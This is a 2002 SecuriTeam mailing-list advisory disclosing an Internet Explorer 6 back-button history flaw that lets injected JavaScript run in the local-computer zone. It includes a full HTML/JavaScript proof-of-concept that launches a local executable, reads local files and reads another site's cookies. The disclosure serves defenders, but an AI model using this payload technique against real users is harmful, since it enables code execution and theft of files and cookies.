[NT] Using the Backbutton under IE Found to be Dangerous

From: support@securiteam.com
Date: 04/17/02 

From: support@securiteam.com
To: list@securiteam.com
Date: Wed, 17 Apr 2002 21:00:34 +0200 (CEST)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -

  Using the Backbutton under IE Found to be Dangerous
------------------------------------------------------------------------

SUMMARY

IE allows URLs to contain JavaScript in their history text. Code injected
in the URL will operate in the same zone/domain as the last URL viewed.
The JavaScript URL can be set to trigger when a user presses the
backbutton.

The normal behavior when a page fails to load is to press the backbutton.
The error page shown by IE is operating in the local computer zone
(res://C:\WINNT\System32\shdoclc.dll/dnserror.htm# on Win2000). Thus, we
can execute code and read local files.

DETAILS

Vulnerable systems:
Internet Explorer version 6.0

Impact:
Read cookies/local files and execute code (triggered when user hits the
back button).

Exploit:
The exploit works as follow: Press one of the links and then the back
button.

Note: Exploit has only been tested on fully patched IE 6.0, with Win XP
and Win2000 pro (assume other OS are also vulnerable). Winmine.exe and
test.txt must exist.

--------------------------CUT HERE-------------------------------
<html>
<h1>Press link and then the backbutton to trigger script.</h1>
<a href="javascript:execFile('file:///c:/winnt/system32/winmine.exe')">
Run Minesweeper (c:/winnt/system32/winmine.exe Win2000 pro)</a><br>
<a href="javascript:execFile('file:///c:/windows/system32/winmine.exe')">
Run Minesweeper (c:/windows/system32/winmine.exe XP, ME etc...)</a><br>
<a href="javascript:readFile('file:///c:/test.txt')">
Read c:\test.txt (needs to be created)</a><br>
<a href="javascript:readCookie('http://www.google.com/')">
Read Google cookie</a>

<script>
// badUrl = "http://www.nonexistingdomain.se"; // Use if not XP
badUrl = "res:";
function execFile(file){
  s = '<object classid=CLSID:11111111-1111-1111-1111-111111111111 ';
  s+= 'CODEBASE='+file+'></OBJECT>';
  backBug(badUrl,s);
}
function readFile(file){
  s = '<iframe name=i src='+file+' style=display:none onload=';
  s+= 'alert(i.document.body.innerText)></iframe>';
  backBug(badUrl,s);
}
function readCookie(url){
  s = '<script>alert(document.cookie);close();<"+"/script>';
  backBug(url,s);
}
function backBug(url,payload){
  len = history.length;
  page = document.location;
  s = "javascript:if (history.length!="+len+") {";
  s+= "open('javascript:document.write(\""+payload+"\")')";
  s+= ";history.back();} else '<script>location=\""+url
  s+= "\";document.title=\""+page+"\";<"+"/script>';";
  location = s;
}
</script>
</html>
--------------------------CUT HERE-------------------------------

ADDITIONAL INFORMATION

The information has been provided by <mailto:sandblad@acc.umu.se> Andreas
Sandblad.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

Quantcast